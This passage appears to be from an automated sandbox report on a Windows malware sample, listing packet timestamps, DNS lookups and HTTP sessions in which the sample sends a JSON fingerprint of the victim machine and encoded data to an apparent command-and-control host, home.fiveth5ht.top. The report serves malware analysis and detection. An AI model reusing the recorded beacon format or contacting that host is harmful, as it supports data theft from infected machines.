                                          Dec 27, 2024 08:55:40.505265951 CET80497365.101.3.217192.168.2.6
                                          Dec 27, 2024 08:55:40.505330086 CET80497365.101.3.217192.168.2.6
                                          Dec 27, 2024 08:55:40.505422115 CET80497365.101.3.217192.168.2.6
                                          Dec 27, 2024 08:55:40.505433083 CET80497365.101.3.217192.168.2.6
                                          Dec 27, 2024 08:55:40.505436897 CET80497365.101.3.217192.168.2.6
                                          Dec 27, 2024 08:55:40.505450964 CET80497365.101.3.217192.168.2.6
                                          Dec 27, 2024 08:55:40.505481005 CET80497365.101.3.217192.168.2.6
                                          Dec 27, 2024 08:55:40.505573034 CET80497365.101.3.217192.168.2.6
                                          Dec 27, 2024 08:55:40.505593061 CET80497365.101.3.217192.168.2.6
                                          Dec 27, 2024 08:55:40.505661011 CET80497365.101.3.217192.168.2.6
                                          Dec 27, 2024 08:55:40.505712032 CET80497365.101.3.217192.168.2.6
                                          Dec 27, 2024 08:55:40.505840063 CET80497365.101.3.217192.168.2.6
                                          Dec 27, 2024 08:55:40.505851030 CET80497365.101.3.217192.168.2.6
                                          Dec 27, 2024 08:55:40.505914927 CET80497365.101.3.217192.168.2.6
                                          Dec 27, 2024 08:55:40.505994081 CET80497365.101.3.217192.168.2.6
                                          Dec 27, 2024 08:55:40.506083012 CET80497365.101.3.217192.168.2.6
                                          Dec 27, 2024 08:55:40.506093025 CET80497365.101.3.217192.168.2.6
                                          Dec 27, 2024 08:55:40.506156921 CET80497365.101.3.217192.168.2.6
                                          Dec 27, 2024 08:55:40.506217003 CET80497365.101.3.217192.168.2.6
                                          Dec 27, 2024 08:55:40.506252050 CET80497365.101.3.217192.168.2.6
                                          Dec 27, 2024 08:55:40.506304026 CET80497365.101.3.217192.168.2.6
                                          Dec 27, 2024 08:55:40.506378889 CET80497365.101.3.217192.168.2.6
                                          Dec 27, 2024 08:55:40.506397963 CET80497365.101.3.217192.168.2.6
                                          Dec 27, 2024 08:55:40.506458998 CET80497365.101.3.217192.168.2.6
                                          Dec 27, 2024 08:55:40.506488085 CET80497365.101.3.217192.168.2.6
                                          Dec 27, 2024 08:55:40.506678104 CET80497365.101.3.217192.168.2.6
                                          Dec 27, 2024 08:55:40.506973028 CET4973680192.168.2.65.101.3.217
                                          Dec 27, 2024 08:55:40.508826017 CET80497365.101.3.217192.168.2.6
                                          Dec 27, 2024 08:55:40.508882999 CET80497365.101.3.217192.168.2.6
                                          Dec 27, 2024 08:55:40.509013891 CET80497365.101.3.217192.168.2.6
                                          Dec 27, 2024 08:55:40.509025097 CET80497365.101.3.217192.168.2.6
                                          Dec 27, 2024 08:55:40.509048939 CET80497365.101.3.217192.168.2.6
                                          Dec 27, 2024 08:55:40.509109020 CET80497365.101.3.217192.168.2.6
                                          Dec 27, 2024 08:55:40.509280920 CET80497365.101.3.217192.168.2.6
                                          Dec 27, 2024 08:55:40.509293079 CET80497365.101.3.217192.168.2.6
                                          Dec 27, 2024 08:55:40.509396076 CET80497365.101.3.217192.168.2.6
                                          Dec 27, 2024 08:55:40.509407043 CET80497365.101.3.217192.168.2.6
                                          Dec 27, 2024 08:55:40.509460926 CET80497365.101.3.217192.168.2.6
                                          Dec 27, 2024 08:55:40.509485960 CET80497365.101.3.217192.168.2.6
                                          Dec 27, 2024 08:55:40.509629011 CET80497365.101.3.217192.168.2.6
                                          Dec 27, 2024 08:55:40.509670973 CET80497365.101.3.217192.168.2.6
                                          Dec 27, 2024 08:55:40.509809971 CET80497365.101.3.217192.168.2.6
                                          Dec 27, 2024 08:55:40.509820938 CET80497365.101.3.217192.168.2.6
                                          Dec 27, 2024 08:55:40.509924889 CET80497365.101.3.217192.168.2.6
                                          Dec 27, 2024 08:55:40.509954929 CET80497365.101.3.217192.168.2.6
                                          Dec 27, 2024 08:55:40.510055065 CET80497365.101.3.217192.168.2.6
                                          Dec 27, 2024 08:55:40.510065079 CET80497365.101.3.217192.168.2.6
                                          Dec 27, 2024 08:55:40.510121107 CET80497365.101.3.217192.168.2.6
                                          Dec 27, 2024 08:55:40.510179043 CET80497365.101.3.217192.168.2.6
                                          Dec 27, 2024 08:55:40.510190010 CET80497365.101.3.217192.168.2.6
                                          Dec 27, 2024 08:55:40.510251045 CET80497365.101.3.217192.168.2.6
                                          Dec 27, 2024 08:55:40.510327101 CET80497365.101.3.217192.168.2.6
                                          Dec 27, 2024 08:55:40.510337114 CET80497365.101.3.217192.168.2.6
                                          Dec 27, 2024 08:55:40.510390997 CET80497365.101.3.217192.168.2.6
                                          Dec 27, 2024 08:55:40.510436058 CET80497365.101.3.217192.168.2.6
                                          Dec 27, 2024 08:55:40.510515928 CET80497365.101.3.217192.168.2.6
                                          Dec 27, 2024 08:55:40.510525942 CET80497365.101.3.217192.168.2.6
                                          Dec 27, 2024 08:55:40.510626078 CET80497365.101.3.217192.168.2.6
                                          Dec 27, 2024 08:55:40.510637999 CET80497365.101.3.217192.168.2.6
                                          Dec 27, 2024 08:55:40.510649920 CET80497365.101.3.217192.168.2.6
                                          Dec 27, 2024 08:55:40.510684013 CET80497365.101.3.217192.168.2.6
                                          Dec 27, 2024 08:55:40.510782957 CET80497365.101.3.217192.168.2.6
                                          Dec 27, 2024 08:55:40.510792971 CET80497365.101.3.217192.168.2.6
                                          Dec 27, 2024 08:55:40.510864973 CET80497365.101.3.217192.168.2.6
                                          Dec 27, 2024 08:55:40.510883093 CET80497365.101.3.217192.168.2.6
                                          Dec 27, 2024 08:55:40.510931969 CET80497365.101.3.217192.168.2.6
                                          Dec 27, 2024 08:55:40.510979891 CET80497365.101.3.217192.168.2.6
                                          Dec 27, 2024 08:55:40.511015892 CET80497365.101.3.217192.168.2.6
                                          Dec 27, 2024 08:55:40.511090994 CET80497365.101.3.217192.168.2.6
                                          Dec 27, 2024 08:55:40.511166096 CET80497365.101.3.217192.168.2.6
                                          Dec 27, 2024 08:55:40.511176109 CET80497365.101.3.217192.168.2.6
                                          Dec 27, 2024 08:55:40.511245012 CET80497365.101.3.217192.168.2.6
                                          Dec 27, 2024 08:55:40.511271954 CET80497365.101.3.217192.168.2.6
                                          Dec 27, 2024 08:55:40.511365891 CET80497365.101.3.217192.168.2.6
                                          Dec 27, 2024 08:55:40.511375904 CET80497365.101.3.217192.168.2.6
                                          Dec 27, 2024 08:55:40.511410952 CET80497365.101.3.217192.168.2.6
                                          Dec 27, 2024 08:55:40.511420965 CET80497365.101.3.217192.168.2.6
                                          Dec 27, 2024 08:55:40.511550903 CET80497365.101.3.217192.168.2.6
                                          Dec 27, 2024 08:55:40.511559963 CET80497365.101.3.217192.168.2.6
                                          Dec 27, 2024 08:55:40.511625051 CET80497365.101.3.217192.168.2.6
                                          Dec 27, 2024 08:55:40.511645079 CET80497365.101.3.217192.168.2.6
                                          Dec 27, 2024 08:55:40.626714945 CET80497365.101.3.217192.168.2.6
                                          Dec 27, 2024 08:55:40.626749039 CET80497365.101.3.217192.168.2.6
                                          Dec 27, 2024 08:55:40.626792908 CET80497365.101.3.217192.168.2.6
                                          Dec 27, 2024 08:55:40.626879930 CET80497365.101.3.217192.168.2.6
                                          Dec 27, 2024 08:55:40.626993895 CET80497365.101.3.217192.168.2.6
                                          Dec 27, 2024 08:55:40.627147913 CET80497365.101.3.217192.168.2.6
                                          Dec 27, 2024 08:55:40.627281904 CET80497365.101.3.217192.168.2.6
                                          Dec 27, 2024 08:55:40.627310991 CET80497365.101.3.217192.168.2.6
                                          Dec 27, 2024 08:55:40.627476931 CET80497365.101.3.217192.168.2.6
                                          Dec 27, 2024 08:55:40.627486944 CET80497365.101.3.217192.168.2.6
                                          Dec 27, 2024 08:55:40.627556086 CET80497365.101.3.217192.168.2.6
                                          Dec 27, 2024 08:55:40.627578974 CET80497365.101.3.217192.168.2.6
                                          Dec 27, 2024 08:55:40.627671957 CET80497365.101.3.217192.168.2.6
                                          Dec 27, 2024 08:55:40.627703905 CET80497365.101.3.217192.168.2.6
                                          Dec 27, 2024 08:55:40.627788067 CET80497365.101.3.217192.168.2.6
                                          Dec 27, 2024 08:55:40.627804995 CET80497365.101.3.217192.168.2.6
                                          Dec 27, 2024 08:55:40.627898932 CET80497365.101.3.217192.168.2.6
                                          Dec 27, 2024 08:55:40.627985954 CET80497365.101.3.217192.168.2.6
                                          Dec 27, 2024 08:55:40.627995014 CET80497365.101.3.217192.168.2.6
                                          Dec 27, 2024 08:55:40.628096104 CET80497365.101.3.217192.168.2.6
                                          Dec 27, 2024 08:55:40.628285885 CET80497365.101.3.217192.168.2.6
                                          Dec 27, 2024 08:55:40.628429890 CET80497365.101.3.217192.168.2.6
                                          Dec 27, 2024 08:55:40.628458023 CET80497365.101.3.217192.168.2.6
                                          Dec 27, 2024 08:55:40.628490925 CET80497365.101.3.217192.168.2.6
                                          Dec 27, 2024 08:55:40.628535986 CET80497365.101.3.217192.168.2.6
                                          Dec 27, 2024 08:55:40.628545046 CET80497365.101.3.217192.168.2.6
                                          Dec 27, 2024 08:55:40.628616095 CET80497365.101.3.217192.168.2.6
                                          Dec 27, 2024 08:55:40.628670931 CET80497365.101.3.217192.168.2.6
                                          Dec 27, 2024 08:55:40.628777981 CET80497365.101.3.217192.168.2.6
                                          Dec 27, 2024 08:55:40.628843069 CET80497365.101.3.217192.168.2.6
                                          Dec 27, 2024 08:55:40.628951073 CET80497365.101.3.217192.168.2.6
                                          Dec 27, 2024 08:55:40.628989935 CET80497365.101.3.217192.168.2.6
                                          Dec 27, 2024 08:55:40.629168034 CET80497365.101.3.217192.168.2.6
                                          Dec 27, 2024 08:55:40.629201889 CET80497365.101.3.217192.168.2.6
                                          Dec 27, 2024 08:55:40.629323959 CET80497365.101.3.217192.168.2.6
                                          Dec 27, 2024 08:55:40.629373074 CET80497365.101.3.217192.168.2.6
                                          Dec 27, 2024 08:55:40.629503965 CET80497365.101.3.217192.168.2.6
                                          Dec 27, 2024 08:55:40.629565001 CET80497365.101.3.217192.168.2.6
                                          Dec 27, 2024 08:55:42.699150085 CET80497365.101.3.217192.168.2.6
                                          Dec 27, 2024 08:55:42.699551105 CET80497365.101.3.217192.168.2.6
                                          Dec 27, 2024 08:55:42.699613094 CET4973680192.168.2.65.101.3.217
                                          Dec 27, 2024 08:55:42.699690104 CET4973680192.168.2.65.101.3.217
                                          Dec 27, 2024 08:55:42.819411993 CET80497365.101.3.217192.168.2.6
                                          Dec 27, 2024 08:55:42.901964903 CET4974680192.168.2.65.101.3.217
                                          Dec 27, 2024 08:55:43.021560907 CET80497465.101.3.217192.168.2.6
                                          Dec 27, 2024 08:55:43.021656990 CET4974680192.168.2.65.101.3.217
                                          Dec 27, 2024 08:55:43.022077084 CET4974680192.168.2.65.101.3.217
                                          Dec 27, 2024 08:55:43.141488075 CET80497465.101.3.217192.168.2.6
                                          Dec 27, 2024 08:55:44.536753893 CET80497465.101.3.217192.168.2.6
                                          Dec 27, 2024 08:55:44.536772966 CET80497465.101.3.217192.168.2.6
                                          Dec 27, 2024 08:55:44.536854029 CET4974680192.168.2.65.101.3.217
                                          Dec 27, 2024 08:55:44.538064957 CET4974680192.168.2.65.101.3.217
                                          Dec 27, 2024 08:55:44.657576084 CET80497465.101.3.217192.168.2.6
                                          Dec 27, 2024 08:55:45.335886955 CET4975380192.168.2.65.101.3.217
                                          Dec 27, 2024 08:55:45.455656052 CET80497535.101.3.217192.168.2.6
                                          Dec 27, 2024 08:55:45.455802917 CET4975380192.168.2.65.101.3.217
                                          Dec 27, 2024 08:55:45.456326962 CET4975380192.168.2.65.101.3.217
                                          Dec 27, 2024 08:55:45.575922012 CET80497535.101.3.217192.168.2.6
                                          Dec 27, 2024 08:55:47.076733112 CET80497535.101.3.217192.168.2.6
                                          Dec 27, 2024 08:55:47.076910973 CET80497535.101.3.217192.168.2.6
                                          Dec 27, 2024 08:55:47.076987028 CET4975380192.168.2.65.101.3.217
                                          Dec 27, 2024 08:55:47.077342033 CET4975380192.168.2.65.101.3.217
                                          Dec 27, 2024 08:55:47.196825981 CET80497535.101.3.217192.168.2.6

                                          UDP Packets

                                          TimestampSource PortDest PortSource IPDest IP
                                          Dec 27, 2024 08:55:33.748888016 CET5550753192.168.2.61.1.1.1
                                          Dec 27, 2024 08:55:33.748954058 CET5550753192.168.2.61.1.1.1
                                          Dec 27, 2024 08:55:34.040904999 CET53555071.1.1.1192.168.2.6
                                          Dec 27, 2024 08:55:34.049057007 CET53555071.1.1.1192.168.2.6
                                          Dec 27, 2024 08:55:38.423804998 CET5241053192.168.2.61.1.1.1
                                          Dec 27, 2024 08:55:38.423883915 CET5241053192.168.2.61.1.1.1
                                          Dec 27, 2024 08:55:38.561553955 CET53524101.1.1.1192.168.2.6
                                          Dec 27, 2024 08:55:38.814254045 CET53524101.1.1.1192.168.2.6
                                          Dec 27, 2024 08:55:42.762868881 CET5241253192.168.2.61.1.1.1
                                          Dec 27, 2024 08:55:42.762868881 CET5241253192.168.2.61.1.1.1
                                          Dec 27, 2024 08:55:42.900791883 CET53524121.1.1.1192.168.2.6
                                          Dec 27, 2024 08:55:42.900824070 CET53524121.1.1.1192.168.2.6
                                          Dec 27, 2024 08:55:45.194472075 CET5241453192.168.2.61.1.1.1
                                          Dec 27, 2024 08:55:45.194539070 CET5241453192.168.2.61.1.1.1
                                          Dec 27, 2024 08:55:45.333853006 CET53524141.1.1.1192.168.2.6
                                          Dec 27, 2024 08:55:45.334656000 CET53524141.1.1.1192.168.2.6

                                          DNS Queries

                                          TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                          Dec 27, 2024 08:55:33.748888016 CET192.168.2.61.1.1.10xd6faStandard query (0)httpbin.orgA (IP address)IN (0x0001)false
                                          Dec 27, 2024 08:55:33.748954058 CET192.168.2.61.1.1.10x483Standard query (0)httpbin.org28IN (0x0001)false
                                          Dec 27, 2024 08:55:38.423804998 CET192.168.2.61.1.1.10x2bd8Standard query (0)home.fiveth5ht.topA (IP address)IN (0x0001)false
                                          Dec 27, 2024 08:55:38.423883915 CET192.168.2.61.1.1.10xf4afStandard query (0)home.fiveth5ht.top28IN (0x0001)false
                                          Dec 27, 2024 08:55:42.762868881 CET192.168.2.61.1.1.10x78e1Standard query (0)home.fiveth5ht.topA (IP address)IN (0x0001)false
                                          Dec 27, 2024 08:55:42.762868881 CET192.168.2.61.1.1.10x233eStandard query (0)home.fiveth5ht.top28IN (0x0001)false
                                          Dec 27, 2024 08:55:45.194472075 CET192.168.2.61.1.1.10xd1c2Standard query (0)home.fiveth5ht.topA (IP address)IN (0x0001)false
                                          Dec 27, 2024 08:55:45.194539070 CET192.168.2.61.1.1.10x92a1Standard query (0)home.fiveth5ht.top28IN (0x0001)false

                                          DNS Answers

                                          TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                          Dec 27, 2024 08:55:28.084472895 CET1.1.1.1192.168.2.60xc066No error (0)shed.dual-low.s-part-0035.t-0009.t-msedge.nets-part-0035.t-0009.t-msedge.netCNAME (Canonical name)IN (0x0001)false
                                          Dec 27, 2024 08:55:28.084472895 CET1.1.1.1192.168.2.60xc066No error (0)s-part-0035.t-0009.t-msedge.net13.107.246.63A (IP address)IN (0x0001)false
                                          Dec 27, 2024 08:55:34.049057007 CET1.1.1.1192.168.2.60xd6faNo error (0)httpbin.org3.218.7.103A (IP address)IN (0x0001)false
                                          Dec 27, 2024 08:55:34.049057007 CET1.1.1.1192.168.2.60xd6faNo error (0)httpbin.org34.226.108.155A (IP address)IN (0x0001)false
                                          Dec 27, 2024 08:55:38.561553955 CET1.1.1.1192.168.2.60x2bd8No error (0)home.fiveth5ht.top5.101.3.217A (IP address)IN (0x0001)false
                                          Dec 27, 2024 08:55:42.900824070 CET1.1.1.1192.168.2.60x78e1No error (0)home.fiveth5ht.top5.101.3.217A (IP address)IN (0x0001)false
                                          Dec 27, 2024 08:55:45.333853006 CET1.1.1.1192.168.2.60xd1c2No error (0)home.fiveth5ht.top5.101.3.217A (IP address)IN (0x0001)false

                                          HTTP Request Dependency Graph

                                          • httpbin.org
                                          • home.fiveth5ht.top

                                          HTTP Packets

                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                          0192.168.2.6497365.101.3.217801460C:\Users\user\Desktop\qZA8AyGxiA.exe
                                          TimestampBytes transferredDirectionData
                                          Dec 27, 2024 08:55:38.937199116 CET12360OUTPOST /OyKvQKriwnyyWjwCxSXF1735186862 HTTP/1.1
                                          Host: home.fiveth5ht.top
                                          Accept: */*
                                          Content-Type: application/json
                                          Content-Length: 504434
                                          Data Raw: 7b 20 22 69 70 22 3a 20 22 38 2e 34 36 2e 31 32 33 2e 31 38 39 22 2c 20 22 63 75 72 72 65 6e 74 5f 74 69 6d 65 22 3a 20 22 38 34 35 32 31 33 32 31 34 30 30 30 31 31 35 36 34 37 31 22 2c 20 22 4e 75 6d 5f 70 72 6f 63 65 73 73 6f 72 22 3a 20 34 2c 20 22 4e 75 6d 5f 72 61 6d 22 3a 20 37 2c 20 22 64 72 69 76 65 72 73 22 3a 20 5b 20 7b 20 22 6e 61 6d 65 22 3a 20 22 43 3a 5c 5c 22 2c 20 22 61 6c 6c 22 3a 20 32 32 33 2e 30 2c 20 22 66 72 65 65 22 3a 20 31 36 38 2e 30 20 7d 20 5d 2c 20 22 4e 75 6d 5f 64 69 73 70 6c 61 79 73 22 3a 20 31 2c 20 22 72 65 73 6f 6c 75 74 69 6f 6e 5f 78 22 3a 20 31 32 38 30 2c 20 22 72 65 73 6f 6c 75 74 69 6f 6e 5f 79 22 3a 20 31 30 32 34 2c 20 22 72 65 63 65 6e 74 5f 66 69 6c 65 73 22 3a 20 33 38 2c 20 22 70 72 6f 63 65 73 73 65 73 22 3a 20 5b 20 7b 20 22 6e 61 6d 65 22 3a 20 22 5b 53 79 73 74 65 6d 20 50 72 6f 63 65 73 73 5d 22 2c 20 22 70 69 64 22 3a 20 30 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 53 79 73 74 65 6d 22 2c 20 22 70 69 64 22 3a 20 34 20 7d 2c 20 7b 20 22 6e 61 [TRUNCATED]
                                          Data Ascii: { "ip": "8.46.123.189", "current_time": "8452132140001156471", "Num_processor": 4, "Num_ram": 7, "drivers": [ { "name": "C:\\", "all": 223.0, "free": 168.0 } ], "Num_displays": 1, "resolution_x": 1280, "resolution_y": 1024, "recent_files": 38, "processes": [ { "name": "[System Process]", "pid": 0 }, { "name": "System", "pid": 4 }, { "name": "Registry", "pid": 92 }, { "name": "smss.exe", "pid": 328 }, { "name": "csrss.exe", "pid": 412 }, { "name": "wininit.exe", "pid": 488 }, { "name": "csrss.exe", "pid": 496 }, { "name": "winlogon.exe", "pid": 560 }, { "name": "services.exe", "pid": 632 }, { "name": "lsass.exe", "pid": 652 }, { "name": "svchost.exe", "pid": 752 }, { "name": "fontdrvhost.exe", "pid": 780 }, { "name": "fontdrvhost.exe", "pid": 788 }, { "name": "svchost.exe", "pid": 868 }, { "name": "svchost.exe", "pid": 928 }, { "name": "dwm.exe", "pid": 996 }, { "name": "svchost.exe", "pid": 436 }, { "name": "svchost.exe", "pid": 376 }, { "name": "svchost.exe", "pid": 60 }, { "name": "svchost.exe", [TRUNCATED]
                                          Dec 27, 2024 08:55:39.057079077 CET4944OUTData Raw: 58 78 49 38 49 48 34 65 5c 2f 45 50 78 37 34 42 62 55 42 71 78 38 44 2b 4e 50 46 50 68 41 36 71 4c 55 32 49 31 4d 2b 47 74 63 76 74 46 4f 6f 43 79 4e 78 64 6d 7a 46 36 62 4c 37 53 4c 55 33 64 31 39 6e 38 7a 79 76 74 45 32 7a 7a 47 5c 2f 61 50 42
                                          Data Ascii: XxI8IH4e\/EPx74BbUBqx8D+NPFPhA6qLU2I1M+GtcvtFOoCyNxdmzF6bL7SLU3d19n8zyvtE2zzG\/aPBX6V3gD9IjMs6yfwd49\/1wzHh3A4fM84w3+q\/GnD\/1PA4rEPC0K\/teKOHckoYjnrp0\/Z4WpXqw+KdOMPePyDxe+jL43+A2X5PmvivwT\/qrgM+xtfLspxH+snCOefW8ZhqCxNej7PhvPs4rUOShJT58TTo0pf
                                          Dec 27, 2024 08:55:39.057130098 CET7416OUTData Raw: 2f 66 36 4c 5c 2f 6e 36 6d 6f 64 7a 79 4c 38 6e 37 72 67 52 65 57 50 33 5c 2f 38 41 5c 2f 42 66 35 36 30 47 6f 78 74 6e 7a 6f 37 5c 2f 75 66 36 65 76 76 36 66 35 7a 52 5c 2f 46 73 5c 2f 64 5c 2f 76 50 38 41 56 66 76 66 54 5c 2f 50 36 39 36 6b 6b
                                          Data Ascii: /f6L\/n6modzyL8n7rgReWP3\/8A\/Bf560Goxtnzo7\/uf6evv6f5zR\/Fs\/d\/vP8AVfvfT\/P696kk\/d7Nk29\/N82WT\/nj+Xf8sUnlx\/x\/O\/8Ayykk\/wBf\/n+VB0Af4H37PLi\/dSf6L\/L17GqyyFWR3\/6d\/ef\/AI+vr1+lWfLdv4\/OST\/lp0+mccU14\/m2I\/nIJe\/\/ACx\/\/V\/9f6gEYkfzH3+
                                          Dec 27, 2024 08:55:39.057147980 CET2472OUTData Raw: 55 4d 65 39 62 66 59 5c 2f 38 41 79 7a 4e 78 35 76 42 7a 39 65 5c 2f 2b 66 79 71 35 75 79 72 70 5c 2f 71 66 2b 57 76 37 76 50 5c 2f 36 76 38 38 65 6c 55 35 50 33 63 6a 6f 34 75 49 48 5c 2f 41 4e 49 69 6c 38 76 6e 30 5c 2f 38 41 72 56 6f 61 55 2b
                                          Data Ascii: UMe9bfY\/8AyzNx5vBz9e\/+fyq5uyrp\/qf+Wv7vP\/6v88elU5P3cjo4uIH\/ANIil8vn0\/8ArVoaU+vy\/UPLdpH+Xf5eZc+v64qt88n7t08t\/wDll5f8v064q43+r37N0Pm\/uj5XuP8APf8Awh8vzNk33PM\/1cf+o\/0f655x2oN+d+X9fMrSfNJ9\/Y\/+x\/y2zj07f1+lDbF3ps\/1kWP3n\/k3+P8An0p\/l\/u
                                          Dec 27, 2024 08:55:39.057228088 CET2472OUTData Raw: 5a 73 6c 32 4a 4c 5a 4a 72 38 5c 2f 4a 39 42 54 42 61 33 6e 4b 59 79 64 73 77 79 76 38 41 33 38 55 41 71 42 37 6f 78 78 31 50 72 5c 2f 4a 32 65 2b 4a 32 51 63 56 35 33 6a 4d 30 6f 5a 4f 75 46 36 47 4a 6e 54 39 6e 6c 39 4a 5c 2f 57 63 4e 52 35 4b
                                          Data Ascii: Zsl2JLZJr8\/J9BTBa3nKYydswyv8A38UAqB7oxx1Pr\/J2e+J2QcV53jM0oZOuF6GJnT9nl9J\/WcNR5KFGjKbxFKEJTrYidOWJxVWWGoxnXrVKjV5SZ\/buS+EXFHCWQYDK6+c0+LMThKU41cx5PqOIr81apVjGOErVKkKVDDwnHD4ajDF1nChRpwjZKMV8o\/tDX\/k+F9H09WIa+1oTsBjDQ2NncB1Oef8AXXVu\/HdBzjg
                                          Dec 27, 2024 08:55:39.057243109 CET2472OUTData Raw: 73 58 67 62 58 76 42 66 77 38 5c 2f 77 43 45 62 30 5a 70 39 4d 75 50 2b 45 43 5c 2f 34 53 32 53 55 61 78 34 70 31 57 43 48 38 77 50 2b 43 32 5c 2f 5c 2f 4a 31 66 77 5c 2f 38 41 2b 7a 66 50 43 6e 5c 2f 71 78 5c 2f 69 76 58 39 52 39 66 79 34 66 38
                                          Data Ascii: sXgbXvBfw8\/wCEb0Zp9MuP+EC\/4S2SUax4p1WCH8wP+C2\/\/J1fw\/8A+zfPCn\/qx\/ivX9R9fy4f8Ft\/+Tq\/h\/8A9m+eFP8A1Y\/xXr+qPomQUPpAcAWc3d8Ur3qlSe3BHEqVueUrPu1Zyesrs8P6ZmBo4P6Mfih7GeMnzw4Hg\/rWYY\/H2VHj\/hSEHD69icR7OUk71pw5Z4idqleVSaUl+ObLnkdaiqxRX+0R\/g
                                          Dec 27, 2024 08:55:39.057301044 CET2472OUTData Raw: 4b 6e 79 66 39 2b 38 5c 2f 30 39 50 72 5c 2f 77 44 58 68 6a 43 66 4f 5c 2f 38 41 48 5c 2f 79 31 5c 2f 77 41 5c 2f 35 5c 2f 57 67 71 6c 30 5c 2f 77 5c 2f 35 45 50 6c 5c 2f 39 4d 61 69 6b 5c 2f 50 6a 7a 66 39 62 31 71 57 51 5c 2f 37 47 7a 5c 2f 41
                                          Data Ascii: Knyf9+8\/09Pr\/wDXhjCfO\/8AH\/y1\/wA\/5\/Wgql0\/w\/5EPl\/9Maik\/Pjzf9b1qWQ\/7Gz\/AK6S\/r0\/zjpTP7ibY+evbyfpQdxDJs+R\/uPn\/nrx\/kdu34Uz5\/vom\/8A6d\/wH5n+nFOH3I\/\/AGp\/x8f59aafvO\/O+P8AdeZ\/nJ5P0oD2v978P+AQbfLbf\/2yij\/z\/nv6VF5aR\/uXT\/8AV3\/
                                          Dec 27, 2024 08:55:39.057349920 CET2472OUTData Raw: 2f 77 42 55 4a 50 4e 38 5c 2f 77 44 7a 30 5c 2f 43 6e 79 66 36 78 50 4a 5c 2f 35 35 57 38 76 32 6a 7a 63 66 72 5c 2f 39 65 6f 5a 4e 6e 7a 4f 36 65 54 2b 39 38 72 39 35 5c 2f 6e 76 39 63 38 56 6d 61 44 4e 33 6c 37 33 43 44 66 35 6f 5c 2f 64 5c 2f
                                          Data Ascii: /wBUJPN8\/wDz0\/Cnyf6xPJ\/55W8v2jzcfr\/9eoZNnzO6eT+98r95\/nv9c8VmaDN3l73CDf5o\/d\/89vp\/L\/PJteT508zfzJ\/rT++97S0FPXKsiI+9\/wDW+ZJL\/nnGaiLc\/f2QmX97\/wA8M5\/z0\/L009n5\/h\/wToP3dorE8Sa9Z+GND1LX9QOLLS7c3NwdwXEYdU+8QQOXHODXbfFPSNG+Fdx8RLSX4r\/B
                                          Dec 27, 2024 08:55:39.177310944 CET7416OUTData Raw: 50 48 6d 6f 4a 6f 33 67 7a 77 44 70 39 39 34 73 5c 2f 5a 67 38 4f 2b 42 64 57 2b 49 58 69 66 57 68 65 32 47 6a 2b 48 72 44 78 72 4d 6c 33 62 61 4a 34 6c 38 53 4a 66 6a 77 66 34 59 38 51 65 49 74 4e 5c 2f 50 4d 71 34 67 2b 6a 39 77 78 78 52 78 64
                                          Data Ascii: PHmoJo3gzwDp994s\/Zg8O+BdW+IXifWhe2Gj+HrDxrMl3baJ4l8SJfjwf4Y8QeItN\/PMq4g+j9wxxRxdx9w9isgy7iPj2nwzQ40zvJcJmdSOfvJ8fn2VcMYzN6eAw1XASxksbmWcZdhs3qUYYvNFLD4arjMXRw2XQpfouaeHn0mOKMh4P8PM8yHiTHZNwdiOIpcE8P57isqw2IyirnOF4ex3EOXZMs0xmHzF0lQwmSYrE5JRq
                                          Dec 27, 2024 08:55:39.177357912 CET7416OUTData Raw: 2f 65 2b 62 5c 2f 41 4b 33 30 7a 32 39 5c 2f 77 71 7a 39 33 42 5c 2f 6a 5c 2f 77 42 56 6e 74 5c 2f 6e 33 71 73 30 66 6d 5c 2f 49 6a 5c 2f 4a 35 76 2b 73 36 5c 2f 68 2b 74 42 70 54 36 5c 2f 4c 39 53 47 50 59 30 62 77 5c 2f 66 5c 2f 77 43 65 58 32
                                          Data Ascii: /e+b\/AK30z29\/wqz93B\/j\/wBVnt\/n3qs0fm\/Ij\/J5v+s6\/h+tBpT6\/L9SGPY0bw\/f\/wCeX2j\/AD6dvT3o7ufM3f8ATT\/I\/wAcfpU0m9Y\/nTf\/AM8o\/cZ7f5+tM+fy5tknyZt\/+u8Pb8P60GhDJGjbHceUnleV0\/fxXH\/P31\/w9zUPmGONH2ceV\/q\/zP5\/56cVaaP7nzxp+68rv6\/8fX\/X7659
                                          Dec 27, 2024 08:55:39.222793102 CET27192OUTData Raw: 7a 6a 4c 38 46 5c 2f 42 44 66 73 45 2b 4c 50 48 48 78 30 30 44 77 37 66 38 41 5c 2f 42 4f 37 78 7a 34 5c 2f 30 37 58 66 68 7a 42 38 4c 66 6a 74 65 2b 4a 5c 2f 32 69 66 44 33 67 6e 39 70 50 78 39 2b 30 70 38 4d 50 45 6e 37 50 75 74 32 58 77 34 31
                                          Data Ascii: zjL8F\/BDfsE+LPHHx00Dw7f8A\/BO7xz4\/07XfhzB8Lfjte+J\/2ifD3gn9pPx9+0p8MPEn7Put2Xw41Hwhn4r6p47fwRqGl\/HzWfgJqPgJrGPW9Sh1WC7aC35PwV+0F8YV\/Zt\/Zj8DeAPC37Pd94p+H\/wU\/aBm+L+i\/F79j74AfGbWfCfxA+If7Xfx5+K2jeHtE8dftBfAH4gaze+G7jwL4z8M6umjeE\/E934QgvN
                                          Dec 27, 2024 08:55:42.699150085 CET157INHTTP/1.1 200 OK
                                          Server: nginx/1.22.1
                                          Date: Fri, 27 Dec 2024 07:55:42 GMT
                                          Content-Type: text/html; charset=utf-8
                                          Content-Length: 1
                                          Connection: close
                                          Data Raw: 30
                                          Data Ascii: 0


                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                          1192.168.2.6497465.101.3.217801460C:\Users\user\Desktop\qZA8AyGxiA.exe
                                          TimestampBytes transferredDirectionData
                                          Dec 27, 2024 08:55:43.022077084 CET98OUTGET /OyKvQKriwnyyWjwCxSXF1735186862?argument=0 HTTP/1.1
                                          Host: home.fiveth5ht.top
                                          Accept: */*
                                          Dec 27, 2024 08:55:44.536753893 CET372INHTTP/1.1 404 NOT FOUND
                                          Server: nginx/1.22.1
                                          Date: Fri, 27 Dec 2024 07:55:44 GMT
                                          Content-Type: text/html; charset=utf-8
                                          Content-Length: 207
                                          Connection: close
